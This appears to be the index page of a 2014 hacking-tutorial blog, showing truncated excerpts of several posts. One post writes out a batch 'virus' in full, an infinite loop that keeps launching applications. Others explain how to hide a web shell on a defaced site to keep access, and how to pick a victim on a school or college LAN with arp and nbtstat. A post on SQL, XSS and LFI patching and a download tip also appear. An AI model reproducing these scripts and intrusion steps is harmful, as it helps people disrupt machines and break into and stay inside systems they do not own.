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Saturday, 19 April 2014

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Deadly Bat File Viruses-Create And Encrypt

Deadly Bat File Viruses-Create And Encrypt
****DEADLY BAT FILE VIRUSES----HOW TO CREATE AND ENCRYPT ????????  **** NOTE: Educational Purpose only Open notepad, type the following lines, select all files under save and give extension with anyname.bat 1. Application Bomber @echo off // It instructs to hide the commands when batch files is executed :x //loop variable start winword start mspaint //open paint start notepad start write start cmd //open command prompt start explorer start control start calc // open calculator goto x // infinite loop This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating...

Thursday, 17 April 2014

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How To Patch Websites Having Sql,Xss&Lfi Vulnerabilities????

How To Patch Websites Having Sql,Xss&Lfi Vulnerabilities????
HOW TO PATCH WEBSITES FROM SQL ,LFI,XSS VULNERABILITIES??? check this out :) :) SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered forstring literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.  ...

Wednesday, 16 April 2014

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Hiding Your Shell And Maintaining Access To Your Defaced Website

Hiding Your Shell And Maintaining Access To Your Defaced Website
HIDING YOUR SHELL AND MAINTAINING ACCESS TO YOUR SHELL/HACKED WEBSITE How can we hide a shell??? suppose 404.php is your shell when you want to hide it just make it as .404.php and upload it :) shell will be hidden !!! check out this here you cannot see 404.php because it is hidden as .404.php but now check dis out :) give .404.php shell gets executed give ur created password and you are into shell !! here you are into shell :) now how to maintain access to your shell or your hacked...

Tuesday, 15 April 2014

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Download Torrentz Files Using IDM

 Download Torrentz Files Using IDM
HOW TO DOWNLOAD TORRENTZ FILES USING INTERNET DOWNLOAD MANAGER AND DOWNLOADING YOUTUBE VIDEOS MADE EASY  Hello every one today im going to explain u hw 2 download youtube videos and torrentz through idm-internet download manager here you go first i start with torrentz 1.Go to or i am using and select a file you want to download 2. now i selected a random file click on magnet link---rightclick---copylinkaddress                                          ...
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Lan Hacking

Lan Hacking
Lan Hacking  Hey friends today I am going to teach you how to hack your school/college LAN without using any tool. YES, you read it correctly "without using a single tool", using only windows command.All you need is Luck and Patience. Six simple process then we are done.1. arp -a This will list the active systems in you LAN, from which you choose a victim,in my case I choose (after trying more than five victims without +ve result)2. Next use "nbtstat -A"This will give you the netbios name , on the table if you see...
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